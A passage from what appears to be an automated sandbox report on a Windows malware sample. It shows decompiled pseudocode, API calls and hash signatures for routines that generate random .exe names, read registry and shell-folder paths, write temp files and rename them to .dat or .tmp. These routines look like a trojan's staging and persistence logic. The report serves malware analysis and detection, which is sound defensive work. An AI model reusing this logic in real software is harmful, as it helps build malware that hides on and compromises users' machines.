        				_t220 = 0;
        				if(E00407B90(_t215, 0,  *(_t230 + 8),  *(_t230 + 0xc)) != 0) {
        					_t200 = E0040CB1D();
        					_v20 = _t200;
        					if(_t200 != 0) {
        						_t204 = E00407C4A(0, 4,  &_v20,  *0x41eabc);
        						_push(_v20);
        						if(_t204 == 0) {
        							E00411106();
        						}
        						E0040CB88(_t215);
        					}
        					E00411106( *0x41eabc);
        					E00411106( *0x41eac0);
        					 *0x41eabc = _t207;
        					 *0x41eac0 = _t207;
        				}
        				goto L9;
        			}

        APIs
        • EnterCriticalSection.KERNEL32(0041EAA4), ref: 004085EF
        • LeaveCriticalSection.KERNEL32(0041EAA4), ref: 00408672
        • InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 00408948
          • Part of subcall function 0040CB1D: CreateMutexW.KERNEL32(0041E5C8,00000000,0041EBC0,0041EAA4,?,?,00408620), ref: 0040CB45
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$CrackCreateEnterFreeHeapInternetLeaveMutex
        • String ID:
        • API String ID: 3106581358-3916222277
        • Opcode ID: 63c2d45459a4a728e339a58661f1cafa24066fbc5905b62cfe620fc5f6ddd24f
        • Instruction ID: 8767c4eedb411f65a7c176bb17cd93873e74f37eeef9dcc6fc072b61af313365
        • Opcode Fuzzy Hash: 63c2d45459a4a728e339a58661f1cafa24066fbc5905b62cfe620fc5f6ddd24f
        • Instruction Fuzzy Hash: 6DD1C431900205ABDF20AB65CE45BEFBBB5AF04304F14887FE991B72E1CB799941CB59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041532E(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
        				signed int _v8;
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				intOrPtr _v24;
        				char* _v28;
        				char* _v32;
        				signed int _t56;
        				WCHAR* _t57;
        				short* _t59;
        				signed short _t71;
        				char* _t77;
        				signed int _t84;
        				signed short* _t85;
        				signed int _t87;
        				intOrPtr _t88;
        				void* _t89;
        
        				_t87 = E0041248B(__eax & 0x000000ff, __ecx & 0x000000ff);
        				_v16 = _t87;
        				_t56 = E0041243F();
        				_t77 = "bcdfghklmnpqrstvwxz012345";
        				if((_t56 & 0x00000100) == 0) {
        					_v32 = "aeiouy6789";
        					_v28 = _t77;
        				} else {
        					_v32 = _t77;
        					_v28 = "aeiouy6789";
        				}
        				_t84 = 0;
        				_v12 = 0;
        				_v8 = 0;
        				if(_t87 > 0) {
        					_v20 = _a4 & 0x00000004;
        					do {
        						if(_v8 == 2) {
        							if((E0041243F() & 0x00000100) == 0) {
        								_v32 = "aeiouy6789";
        								_v28 = _t77;
        							} else {
        								_v32 = _t77;
        								_v28 = "aeiouy6789";
        							}
        							_v8 = _v8 & 0x00000000;
        						}
        						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
        						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000f) + 0xa;
        						if(_v20 == 0 || _t84 - _v12 <= 1 || (E0041243F() & 0x00000101) != 0x101) {
        							_t71 =  *((char*)(E0041248B(_v24 - 1, 0) + _t88));
        						} else {
        							_t71 = 0x20;
        							_v12 = _t84;
        						}
        						_a8[_t84] = _t71;
        						_t84 = _t84 + 1;
        						_v8 = _v8 + 1;
        					} while (_t84 < _v16);
        					_t87 = _v16;
        				}
        				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
        					_t85 = _a8;
        				} else {
        					_t85 = _a8;
        					_t59 = _t85 + _t87 * 2 - 2;
        					while( *_t59 == 0x20) {
        						_t59 = _t59 - 2;
        						_t87 = _t87 - 1;
        						if(_t87 != 0) {
        							continue;
        						} else {
        						}
        						goto L24;
        					}
        				}
        				L24:
        				_t57 = 0;
        				_t85[_t87] = 0;
        				if((_a4 & 0x00000002) != 0) {
        					_t57 = CharUpperW( *_t85 & 0x0000ffff);
        					 *_t85 = 0;
        				}
        				return _t57;
        			}

        APIs
          • Part of subcall function 0041243F: GetTickCount.KERNEL32 ref: 0041243F
        • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041544F
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CharCountTickUpper
        • String ID: .exe$aeiouy6789$bcdfghklmnpqrstvwxz012345
        • API String ID: 2674899715-3938053301
        • Opcode ID: 6dd538802afa6c65e97fe1efeace7a2e59a061cd4dd51bb9ae7ca8ac98397921
        • Instruction ID: e2c7b2ebac527a42ecbed4caeac2a8f035c508ea89164a1ab0844a3239ad363e
        • Opcode Fuzzy Hash: 6dd538802afa6c65e97fe1efeace7a2e59a061cd4dd51bb9ae7ca8ac98397921
        • Instruction Fuzzy Hash: EB319171D1061ADBCB109FA5C1453FEB7B0EF80344F54806BD961EB281E7BC9AC18B99
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 85%
        			E0040A959(void* __ecx, char* __edx, void* __eflags) {
        				intOrPtr _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v52;
        				char _v76;
        				char _v116;
        				char _v636;
        				short _v1156;
        				void* __edi;
        				void* __esi;
        				void* _t28;
        				void* _t30;
        				void* _t35;
        				void* _t39;
        				char* _t42;
        				void* _t52;
        				WCHAR* _t55;
        				char* _t60;
        				signed int _t61;
        				void* _t62;
        				intOrPtr _t70;
        
        				_t54 = __edx;
        				_t52 = __ecx;
        				E004111B9( &_v12,  &_v12, 0, 8);
        				_t28 = 0x60;
        				E0040CA33(_t28,  &_v116);
        				_t30 = 0x61;
        				E0040CA33(_t30,  &_v52);
        				_t55 =  &_v636;
        				_t35 = E004150D3(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
        				if(_t35 != 0xffffffff) {
        					_t65 = _t35;
        					if(_t35 > 0) {
        						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
        						E0040A711(_t65,  &_v1156,  &_v12);
        					}
        				}
        				if(_v8 != 0) {
        					L9:
        					if(_t70 <= 0) {
        						return E00411106(_v12);
        					}
        					_push(0xcb);
        					return E004095BC(_t54, _v12, 0x63);
        				} else {
        					_t60 =  &_v76;
        					_t39 = 0x62;
        					E0040CA33(_t39, _t60);
        					_v28 = 0x23;
        					_v24 = 0x1a;
        					_v20 = 0x26;
        					_v16 = _t60;
        					_t61 = 0;
        					do {
        						_t42 =  &_v636;
        						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
        						_t68 = _t42;
        						if(_t42 == 0) {
        							_t54 =  &_v16;
        							E004165E9( &_v636,  &_v16, _t68, 1, 2, E0040A76B,  &_v12, 0, 0, 0);
        						}
        						_t61 = _t61 + 1;
        					} while (_t61 < 3);
        					_t70 = _v8;
        					goto L9;
        				}
        			}

        APIs
          • Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8
        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040A9BB
        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040AA0B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: EnvironmentExpandFolderOpenPathStrings
        • String ID: #$&
        • API String ID: 1994525040-3870246384
        • Opcode ID: 4bb0de24b23f1c83c464883d01574158cbaabce5f035e47c61a3bd17b19ba92f
        • Instruction ID: bbbf1cebff6ff9ccf6a0c9ca70cea9f2276e7aeb110cf395158a200f1965a09d
        • Opcode Fuzzy Hash: 4bb0de24b23f1c83c464883d01574158cbaabce5f035e47c61a3bd17b19ba92f
        • Instruction Fuzzy Hash: 643150B2E00218BADF10EBA0DC89FDEB77CEB04304F10456BB601F7191D6789A858B99
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 85%
        			E0040B209(void* __ecx, char* __edx, void* __eflags) {
        				intOrPtr _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v44;
        				char _v68;
        				char _v120;
        				char _v644;
        				short _v1164;
        				void* __edi;
        				void* __esi;
        				void* _t28;
        				void* _t30;
        				void* _t35;
        				void* _t39;
        				char* _t42;
        				void* _t52;
        				WCHAR* _t55;
        				char* _t60;
        				signed int _t61;
        				void* _t62;
        				intOrPtr _t70;
        
        				_t54 = __edx;
        				_t52 = __ecx;
        				E004111B9( &_v12,  &_v12, 0, 8);
        				_t28 = 0x77;
        				E0040CA33(_t28,  &_v120);
        				_t30 = 0x78;
        				E0040CA33(_t30,  &_v44);
        				_t55 =  &_v644;
        				_t35 = E004150D3(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
        				if(_t35 != 0xffffffff) {
        					_t65 = _t35;
        					if(_t35 > 0) {
        						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
        						E0040AFAC(_t65,  &_v1164,  &_v12);
        					}
        				}
        				if(_v8 != 0) {
        					L9:
        					if(_t70 <= 0) {
        						return E00411106(_v12);
        					}
        					_push(0xcb);
        					return E004095BC(_t54, _v12, 0x7a);
        				} else {
        					_t60 =  &_v68;
        					_t39 = 0x79;
        					E0040CA33(_t39, _t60);
        					_v28 = 0x1a;
        					_v24 = 0x26;
        					_v20 = 0x23;
        					_v16 = _t60;
        					_t61 = 0;
        					do {
        						_t42 =  &_v644;
        						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
        						_t68 = _t42;
        						if(_t42 == 0) {
        							_t54 =  &_v16;
        							E004165E9( &_v644,  &_v16, _t68, 1, 2, E0040AFE4,  &_v12, 0, 0, 0);
        						}
        						_t61 = _t61 + 1;
        					} while (_t61 < 3);
        					_t70 = _v8;
        					goto L9;
        				}
        			}

        APIs
          • Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8
        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040B26B
        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040B2BB
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: EnvironmentExpandFolderOpenPathStrings
        • String ID: #$&
        • API String ID: 1994525040-3870246384
        • Opcode ID: 84b794263292700c73807caf9bdfb40b9bef29356d879a4d81021beeeb318a01
        • Instruction ID: ae22c46193441e3666281f50073b9b66f937e5a6e2bdf1b723683a27e7893c49
        • Opcode Fuzzy Hash: 84b794263292700c73807caf9bdfb40b9bef29356d879a4d81021beeeb318a01
        • Instruction Fuzzy Hash: 38312DB2D00218ABDF10EBE19C89BDEB77CEB04314F10457AF605F7191D7789A468BA9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00406D1E(void* __ecx, WCHAR* __edi, char _a4) {
        				char _v108;
        				char _v158;
        				char _v178;
        				char _v198;
        				char _v596;
        				void* __esi;
        				signed int _t12;
        				int _t14;
        				WCHAR* _t16;
        				char* _t18;
        				WCHAR* _t19;
        
        				_t19 = __edi;
        				 *__edi = 0;
        				E00406CC9(__ecx,  &_v596);
        				_t2 =  &_a4; // 0x40646b
        				_t12 =  *_t2;
        				if(_t12 == 0) {
        					L6:
        					_t18 =  &_v178;
        					goto L7;
        				} else {
        					_t12 = _t12 - 1;
        					if(_t12 == 0) {
        						_t18 =  &_v198;
        						L7:
        						_t16 = 0x41e5f0;
        						goto L8;
        					} else {
        						_t12 = _t12 - 1;
        						if(_t12 == 0) {
        							goto L6;
        						} else {
        							_t14 = _t12 - 1;
        							if(_t14 == 0) {
        								_t16 = L"SOFTWARE\\Microsoft";
        								_t18 =  &_v158;
        								L8:
        								_t21 =  &_v108;
        								_t14 = E00411311(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
        								if(_t14 != 0) {
        									_t14 = E00416745(_t21, _t19, _t16);
        									if(_t14 == 0) {
        										L12:
        										_t14 = 0;
        										 *_t19 = 0;
        									} else {
        										if(_a4 == 0) {
        											_t14 = PathRenameExtensionW(_t19, L".dat");
        											if(_t14 == 0) {
        												goto L12;
        											}
        										}
        									}
        								}
        							}
        						}
        					}
        				}
        				return _t14;
        			}

        APIs
        • PathRenameExtensionW.SHLWAPI(?,.dat,?,0041E5F0,00000000,00000032,?,77E49EB0,00000000), ref: 00406D97
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: ExtensionPathRename
        • String ID: .dat$SOFTWARE\Microsoft$kd@
        • API String ID: 3337224433-1301899116
        • Opcode ID: 127d66ff45b43ca125d60486128f21c1d8a54b3557ddd1bf2460bf575f947e20
        • Instruction ID: 89dc2482d47ac3911c6f231eaf28b535e19f73afadb74b6c94608404e1cab4be
        • Opcode Fuzzy Hash: 127d66ff45b43ca125d60486128f21c1d8a54b3557ddd1bf2460bf575f947e20
        • Instruction Fuzzy Hash: 0401F130700219AADB209B74CE40BEAB368AF81344F450077F806F22C0E73CDEA4C65E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00418161(void* __edx) {
        				void _v108;
        				char _v120;
        				char _v212;
        				long _v216;
        				char _v224;
        				void* __esi;
        				void* _t8;
        				void* _t16;
        
        				_t16 = __edx;
        				_t8 = GetThreadDesktop(GetCurrentThreadId());
        				if(_t8 != 0) {
        					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
        					if(_t8 != 0 && _v216 == 0x4e) {
        						E004069C2(0x92d1e1eb,  &_v212, 0);
        						_t8 = E00411177( &_v224,  &_v120, 0x4c);
        						if(_t8 == 0) {
        							_t8 = E00417E1B( &_v120, _t16, 0x41fe78, _t8);
        							if(_t8 == 0) {
        								_t8 = E00418086(0x41fe78, 0);
        							} else {
        								 *0x41e590 =  *0x41e590 | 0x00000004;
        							}
        						}
        					}
        				}
        				return _t8;
        			}

        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0041816E
        • GetThreadDesktop.USER32(00000000), ref: 00418175
        • GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0041818E
          • Part of subcall function 00417E1B: TlsAlloc.KERNEL32(0041FE78,00000000,0000018C,00000000,00000000), ref: 00417E34
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Thread$AllocCurrentDesktopInformationObjectUser
        • String ID: N
        • API String ID: 454308152-1130791706
        • Opcode ID: 062d4fd2bfbdabdd0aa5eceac9a05d11ffd3b13ba2d40cb7d3d4404fcbafbc34
        • Instruction ID: b56f609b0de39cda6622fb1b6d7f59f4252aecf3e6a65102bff70858e8c64588
        • Opcode Fuzzy Hash: 062d4fd2bfbdabdd0aa5eceac9a05d11ffd3b13ba2d40cb7d3d4404fcbafbc34
        • Instruction Fuzzy Hash: 1B01F7726447007BE620A7619D4AFE7379C9B00708F00452FFA15E21E0EF38DA89C69F
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E0041623C(intOrPtr _a4, char _a8) {
        				short _v524;
        				char _v1044;
        				void* __edi;
        				void* _t12;
        				void* _t20;
        				void* _t21;
        
        				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
        					L6:
        					return 0;
        				}
        				_t20 = 0;
        				while(1) {
        					_push(_a4);
        					_push(E0041243F());
        					_push(L"tmp");
        					_t19 =  &_v1044;
        					_t12 = E00411DF9(_t11, 0x104,  &_v1044, L"%s%08x.%s");
        					_t21 = _t21 + 0x10;
        					if(_t12 == 0xffffffff) {
        						goto L6;
        					}
        					_t5 =  &_a8; // 0x412be0
        					if(E00416745(_t19,  *_t5,  &_v524) == 0 || E00416070(_a8, 0, 0) == 0) {
        						_t20 = _t20 + 1;
        						if(_t20 < 0x64) {
        							continue;
        						}
        						goto L6;
        					} else {
        						return 1;
        					}
        				}
        				goto L6;
        			}

        APIs
        • GetTempPathW.KERNEL32(000000F6,?), ref: 00416253
          • Part of subcall function 0041243F: GetTickCount.KERNEL32 ref: 0041243F
          • Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764
          • Part of subcall function 00416070: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,+A,004162AF,00000001,00000000,00000000,+A,?), ref: 0041608A
          • Part of subcall function 00416070: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004160AD
          • Part of subcall function 00416070: CloseHandle.KERNEL32(00000000), ref: 004160BA
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
        • String ID: %s%08x.%s$tmp$+A
        • API String ID: 3395140874-1003815928
        • Opcode ID: f425d63e668f1630b2adf3729376117e9434de335027b571d865d14b18f07eec
        • Instruction ID: f502047c9eee2fd9657ae4218a466e2de827e189329ec1417e7748228a185e2d
        • Opcode Fuzzy Hash: f425d63e668f1630b2adf3729376117e9434de335027b571d865d14b18f07eec
        • Instruction Fuzzy Hash: 3301217594022826EE207A24DC06BEB371DDB42714F1241A3FE60B62E1D2B9CDDA869C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004164C7(WCHAR* _a4) {
        				signed int _t4;
        				short _t9;
        				signed short _t10;
        				WCHAR* _t11;
        				WCHAR* _t12;
        				int _t18;
        
        				_t12 = _a4;
        				_t9 = 0;
        				_t11 = PathSkipRootW(_t12);
        				if(_t11 == 0) {
        					_t11 = _t12;
        				}
        				while(1) {
        					_t4 =  *_t11 & 0x0000ffff;
        					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
        						goto L5;
        					}
        					L11:
        					_t11 =  &(_t11[1]);
        					continue;
        					L5:
        					_t10 = _t4;
        					 *_t11 = 0;
        					if(GetFileAttributesW(_t12) == 0xffffffff) {
        						_t18 = CreateDirectoryW(_t12, 0);
        					}
        					if(_t18 == 0) {
        						L13:
        						return _t9;
        					} else {
        						if(_t10 == 0) {
        							_t9 = 1;
        							goto L13;
        						}
        						 *_t11 = _t10;
        						goto L11;
        					}
        				}
        			}

        APIs
        • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0040564B,?,?,?,?,?), ref: 004164D2
        • GetFileAttributesW.KERNEL32(?,?,00000000,0040564B,?,?,?,?,?), ref: 004164FA
        • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0040564B,?,?,?,?,?), ref: 00416508
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AttributesCreateDirectoryFilePathRootSkip
        • String ID: .exe
        • API String ID: 4231520044-4119554291
        • Opcode ID: 778904d26f70faf715ccfea7a6dfd50feb6d1a11f594b1abd8981a6d058dea1a
        • Instruction ID: b296e16adbaf5266381eb15943103e15184f203eb26eeb2d2f2285b477f7cbc9
        • Opcode Fuzzy Hash: 778904d26f70faf715ccfea7a6dfd50feb6d1a11f594b1abd8981a6d058dea1a
        • Instruction Fuzzy Hash: 8CF0F6316412116AC6300B6969046F777999E01BB4B67552BFC91E3364D738ECC1D66C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00410396(WCHAR* __ebx, void* __ecx, char _a4) {
        				void* __edi;
        				long _t3;
        				WCHAR* _t13;
        
        				_t13 = __ebx;
        				if( *0x41ec80 == 0) {
        					E00406D1E(__ecx, 0x41ec80, 2);
        					 *((short*)(E00411142(0x41ee88, 0x41ec80, E00411C55(0x41ec80) + _t10) + 0x41ee88)) = 0;
        					_t3 = PathRemoveFileSpecW(0x41ee88);
        				}
        				if(_t13 != 0) {
        					E004114A7(_t3 | 0xffffffff, 0x41ec80, _t13);
        					_t3 = PathRenameExtensionW(_t13, L".tmp");
        				}
        				if(_a4 != 0 &&  *0x41e7fc > 1) {
        					E004164C7(0x41ee88);
        					E00414661(0x41ee88);
        					_t3 = GetFileAttributesW(0x41ec80);
        					if(_t3 != 0xffffffff) {
        						return E00414661(0x41ec80);
        					}
        				}
        				return _t3;
        			}

        APIs
        • PathRemoveFileSpecW.SHLWAPI(0041EE88,0041EE88,0041EC80,00000000,00000002,00000000,00020000,00410F09,00000001,?,404A9F61,00000002,00002723,00020000,00000000,00002722), ref: 004103CE
        • PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00410F09,00000001,?,404A9F61,00000002,00002723,00020000,00000000,00002722,00020000,?,?), ref: 004103EA
        • GetFileAttributesW.KERNEL32(0041EC80,0041EE88,0041EE88,00000000,00020000,00410F09,00000001,?,404A9F61,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 0041040D
          • Part of subcall function 00406D1E: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041E5F0,00000000,00000032,?,77E49EB0,00000000), ref: 00406D97
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Path$ExtensionFileRename$AttributesRemoveSpec
        • String ID: .tmp
        • API String ID: 3627892477-2986845003
        • Opcode ID: 24abfd42e9b365e8392218d8372e6a93ad79fbc69afd2f1e94745a1b6fbe3a5b
        • Instruction ID: 395e199ffee47ae56be38f89108b9a1c2a25f710d8bcbe1646f48d27bb1ec5e3
        • Opcode Fuzzy Hash: 24abfd42e9b365e8392218d8372e6a93ad79fbc69afd2f1e94745a1b6fbe3a5b
        • Instruction Fuzzy Hash: 2EF0A23560021026E32037375C4AEFF95594FC2724F15853FF926A15E2CBBC48C6826D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 80%
        			E004162C9(void* __edx, void* __esi) {
        				void* _t11;
        				void* _t13;
        				void* _t24;
        				void* _t25;
        				void* _t27;
        
        				asm("in al, dx");
        				asm("adc [eax+eax], al");
        				 *((intOrPtr*)(__esi + 0x57)) =  *((intOrPtr*)(__esi + 0x57)) + __edx;
        				if(GetTempPathW(0xf6, _t25 - 0x208) - 1 > 0xf5) {
        					L6:
        					_t11 = 0;
        				} else {
        					_t24 = 0;
        					while(1) {
        						_push(E0041243F());
        						_push(L"tmp");
        						_t21 = _t25 - 0x410;
        						_t13 = E00411DF9(_t12, 0x104, _t25 - 0x410, L"%s%08x");
        						_t27 = _t27 + 0xc;
        						if(_t13 == 0xffffffff) {
        							goto L6;
        						}
        						if(E00416745(_t21,  *(_t25 + 8), _t25 - 0x208) == 0 || CreateDirectoryW( *(_t25 + 8), 0) == 0) {
        							_t24 = _t24 + 1;
        							if(_t24 < 0x64) {
        								continue;
        							} else {
        								goto L6;
        							}
        						} else {
        							_t11 = 1;
        						}
        						goto L7;
        					}
        					goto L6;
        				}
        				L7:
        				return _t11;
        			}

        APIs
        • GetTempPathW.KERNEL32(000000F6,?), ref: 004162DC
          • Part of subcall function 0041243F: GetTickCount.KERNEL32 ref: 0041243F
          • Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764
        • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0041632E
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Path$CombineCountCreateDirectoryTempTick
        • String ID: %s%08x$tmp
        • API String ID: 1218007593-1196434543
        • Opcode ID: 04dbca1ce315deab7dd89dbcf0924a94e75cfe1d88b7cd1938c2f3929a15ab6a
        • Instruction ID: dceafe48e37272efd4990c1691396525ef3f70845153a0ac86ab32ffd0eb6a22
        • Opcode Fuzzy Hash: 04dbca1ce315deab7dd89dbcf0924a94e75cfe1d88b7cd1938c2f3929a15ab6a
        • Instruction Fuzzy Hash: 30F04F702003681BCF20AB24CD04BEAB7288B12314F1200B3EE70EA1E1C3B9CEC6874D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00416070(WCHAR* _a4, void* _a8, long _a12) {
        				long _t14;
        				void* _t15;
        
        				_t14 = 0;
        				_t15 = CreateFileW(_a4, 0x40000000, 1, 0, 2, 0x80, 0);
        				if(_t15 != 0xffffffff) {
        					if(_a8 == 0 || _a12 == 0 || WriteFile(_t15, _a8, _a12,  &_a12, 0) != 0) {
        						_t14 = 1;
        					}
        					CloseHandle(_t15);
        					if(_t14 != 1) {
        						E0041621B(_a4);
        					}
        				}
        				return _t14;
        			}

        APIs
        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,+A,004162AF,00000001,00000000,00000000,+A,?), ref: 0041608A
        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004160AD
        • CloseHandle.KERNEL32(00000000), ref: 004160BA
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: File$CloseCreateHandleWrite
        • String ID: +A
        • API String ID: 1065093856-2476349683
        • Opcode ID: d07631f879466671dfc98515ef254cc9fbdd1112f359b94b0b35e08d023f0984
        • Instruction ID: dfd4f39ee0db3b3ef5b18002600c4d87ea541684c7d806c35464b335ee721cfc
        • Opcode Fuzzy Hash: d07631f879466671dfc98515ef254cc9fbdd1112f359b94b0b35e08d023f0984
        • Instruction Fuzzy Hash: 27F06272141218BFEB21AE549C85FEB3B1DAB05354F09812BF910A51A0C375CDD58B99
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041290D(void* __ecx) {
        				signed int _v8;
        				struct HINSTANCE__* _t7;
        
        				_v8 = _v8 & 0x00000000;
        				_t7 = GetModuleHandleW(L"kernel32.dll");
        				if(_t7 == 0) {
        					L4:
        					return _t7 & 0xffffff00 | _v8 != 0x00000000;
        				} else {
        					_t7 = GetProcAddress(_t7, "IsWow64Process");
        					if(_t7 == 0) {
        						goto L4;
        					} else {
        						_t7 = _t7->i(0xffffffff,  &_v8);
        						if(_t7 != 0) {
        							goto L4;
        						} else {
        							return 0;
        						}
        					}
        				}
        			}

        APIs
        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00406240,00000000,0040675B), ref: 0041291A
        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0041292A
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressHandleModuleProc
        • String ID: IsWow64Process$kernel32.dll
        • API String ID: 1646373207-3024904723
        • Opcode ID: fe8fec8c6535b4f49d39de23e23294976413fdb8656372ac0d61bcab90fb45ed
        • Instruction ID: 344f4064f754478aabcfd5f558ffddaffd40416491a667f935a38ffbebd0006b
        • Opcode Fuzzy Hash: fe8fec8c6535b4f49d39de23e23294976413fdb8656372ac0d61bcab90fb45ed
        • Instruction Fuzzy Hash: 26E0DFB0310341B6DF0497A4CF0ABAF32A89B407A9F2002A8A010F20E0EAB8CA44C52D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040F932(intOrPtr _a4, intOrPtr _a12) {
        				void* __esi;
        				void* _t6;
        				signed int _t7;
        				intOrPtr _t9;
        
        				if(_a12 == 0x64 || _a12 == 0x33) {
        					EnterCriticalSection(0x41ec60);
        					_t7 = E0040F357(_a4);
        					if(_t7 != 0xffffffff) {
        						_t9 =  *0x41ec78; // 0x0
        						_t7 = SetEvent( *(_t7 * 0x24 + _t9 + 4));
        					}
        					LeaveCriticalSection(0x41ec60);
        					return _t7;
        				}
        				return _t6;
        			}

        APIs
        • EnterCriticalSection.KERNEL32(0041EC60), ref: 0040F948
